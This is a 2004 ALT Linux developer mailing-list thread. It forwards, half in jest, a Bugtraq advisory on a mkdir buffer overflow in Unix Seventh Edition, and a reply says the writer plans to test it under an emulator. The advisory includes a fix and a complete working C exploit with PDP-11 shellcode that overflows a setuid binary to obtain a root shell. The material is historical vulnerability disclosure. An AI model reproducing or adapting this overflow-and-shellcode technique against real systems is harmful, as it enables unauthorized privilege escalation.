* [devel] [newsham@lava.net: Mkdir buffer overflow vulnerability in Unix Seventh Edition.]
@ 2004-06-03 15:29 Dmitry V. Levin
2004-06-03 15:33 ` Alexey I. Froloff
0 siblings, 1 reply; 2+ messages in thread
From: Dmitry V. Levin @ 2004-06-03 15:29 UTC (permalink / raw)
To: ALT Devel discussion list
[-- Attachment #1: Type: text/plain, Size: 4202 bytes --]
На правах анекдота.
----- Forwarded message from Tim Newsham <newsham@lava.net> -----
Date: Wed, 2 Jun 2004 17:30:50 -1000 (HST)
From: Tim Newsham <newsham@lava.net>
To: bugtraq@securityfocus.com
Subject: Mkdir buffer overflow vulnerability in Unix Seventh Edition.
Mkdir buffer overflow vulnerability in Unix Seventh Edition.
2 Jun 2004
SYNOPSIS
A vulnerability in the mkdir system utility can allow an
unprivileged user to gain root privileges in UNIX 7th
Edition systems.
DESCRIPTION
The mkdir utility (/bin/mkdir) creates directories on behalf
of the user. Mkdir is granted root privileges through the
set-user-id mechanism to allow it to create directories with
the mknod system call. Before making a subdirectory, mkdir first
verifies that the path leading up to the new directory exists
and that the user can access the directory. In the process
of performing these tests, mkdir copies a portion of the
user supplied path into a fixed sized temporary buffer.
This occurs in the function mkdir() (see /usr/src/cmd/mkdir.c).
The mkdir() function first finds the position of the last path
divider character ('/') in the provided path, and then copies
all the data up to this point into the pname buffer. Since
the pname buffer is only 128 bytes long, and the user provided
path can have a much longer length, a buffer overflow condition
exists.
SOLUTION
The fix to this problem is simple -- ensure that the provided
path is no longer than the maximum path length. This can be
done by adding:
if(strlen(d) >= 126) {
fprintf(stderr, "mkdir: path is too long\n");
++Errors;
return;
}
to the start of the mkdir() function. Comparing with a value
slightly less than the maximum path length ensures that the
buffer is also large enough to contain the path to the "."
link that is created later in the function.
EXPLOIT
The following program exploits this problem on the PDP-11
platform to run a shell with the effective user id of the
superuser.
----
/*
* Exploit for /bin/mkdir Unix V7 PDP-11.
* mkdir has a buffer overflow when checking if the directory
* in /arg/with/slashes/fname exists.
*
* This will run /bin/sh with euid 0, but not uid 0. Since
* the shell doesn't do anything special about this, we don't
* really care. If you care, run setuid(0); execl("/bin/sh", 0);
*/
/*
.globl _main
_main:
mov pc,r1
sub $-[sh-_main-2], r1 / pointer to sh
mov r1, r2
sub $-8, r2
clrb -1(r2) / null terminate
mov r1, r2
clr -(r1) / char *env[] = {0}
mov r1, r3
mov r2, -(r1) / char *argv[] = {sh, 0}
mov r1, r4
mov r3, -(r1) / reverse of sh,argv,env
mov r4, -(r1)
mov r2, -(r1)
sys 59.; 11111; 11111; 11111 / call execve
argv: 11111; 11111
sh: </bin/sh>
*/
char egg[] = { 0301, 021, 0301, 0345, 0326, 0377, 0102, 020,
0302, 0345, 0370, 0377, 062, 0212, 0377, 0377,
0102, 020, 041, 012, 0103, 020, 0241, 020,
0104, 020, 0341, 020, 041, 021, 0241, 020,
073, 0211, 0111, 022, 0111, 022, 0111, 022,
0111, 022, 0111, 022, 057, 0142, 0151, 0156,
057, 0163, 0150, 0 };
#define NOPSLIDE 50
#define CNT 136
#define PC 0xfea0
main(argc, argv)
int argc;
char **argv;
{
char buf[400];
int i;
char *argv2[4];
/* nop slide + egg */
for(i = 0; i < NOPSLIDE; ) {
buf[i++] = 0301;
buf[i++] = 021;
}
strcpy(buf + i, egg);
/* pad out to CNT */
for(i = strlen(buf); i < CNT; i++)
buf[i] = 'a';
/* overwrite retaddr */
buf[i++] = PC & 0xff;
buf[i++] = PC >> 8;
/* extra stuff */
buf[i++] = '/';
buf[i++] = 'a';
buf[i++] = 0;
argv2[0] = "/bin/mkdir";
argv2[1] = buf;
argv2[2] = 0;
execv(argv2[0], argv2);
return 0;
}
----- End forwarded message -----
--
ldv
[-- Attachment #2: Type: application/pgp-signature, Size: 189 bytes --]
^ permalink raw reply [flat|nested] 2+ messages in thread
* Re: [devel] [newsham@lava.net: Mkdir buffer overflow vulnerability in Unix Seventh Edition.]
2004-06-03 15:29 [devel] [newsham@lava.net: Mkdir buffer overflow vulnerability in Unix Seventh Edition.] Dmitry V. Levin
@ 2004-06-03 15:33 ` Alexey I. Froloff
0 siblings, 0 replies; 2+ messages in thread
From: Alexey I. Froloff @ 2004-06-03 15:33 UTC (permalink / raw)
To: ALT Devel discussion list
[-- Attachment #1: Type: text/plain, Size: 328 bytes --]
* Dmitry V. Levin <ldv@> [040603 19:30]:
> На правах анекдота.
[..skip..]
> * Exploit for /bin/mkdir Unix V7 PDP-11.
О! А у меня есть Unix V7 PDP-11 под simh ;-) Надо будет
проверить...
--
Regards, Sir Raorn.
-------------------
В каком дистрибутиве apt по-умолчанию настроен на Сизиф?
-- zerg in sisyphus@
[-- Attachment #2: Type: application/pgp-signature, Size: 189 bytes --]
^ permalink raw reply [flat|nested] 2+ messages in thread
end of thread, other threads:[~2004-06-03 15:33 UTC | newest]
Thread overview: 2+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2004-06-03 15:29 [devel] [newsham@lava.net: Mkdir buffer overflow vulnerability in Unix Seventh Edition.] Dmitry V. Levin
2004-06-03 15:33 ` Alexey I. Froloff
ALT Linux Team development discussions
This inbox may be cloned and mirrored by anyone:
git clone --mirror http://lore.altlinux.org/devel/0 devel/git/0.git
# If you have public-inbox 1.1+ installed, you may
# initialize and index your mirror using the following commands:
public-inbox-init -V2 devel devel/ http://lore.altlinux.org/devel \
devel@altlinux.org devel@altlinux.ru devel@lists.altlinux.org devel@lists.altlinux.ru devel@linux.iplabs.ru mandrake-russian@linuxteam.iplabs.ru sisyphus@linuxteam.iplabs.ru
public-inbox-index devel
Example config snippet for mirrors.
Newsgroup available over NNTP:
nntp://lore.altlinux.org/org.altlinux.lists.devel
AGPL code for this site: git clone https://public-inbox.org/public-inbox.git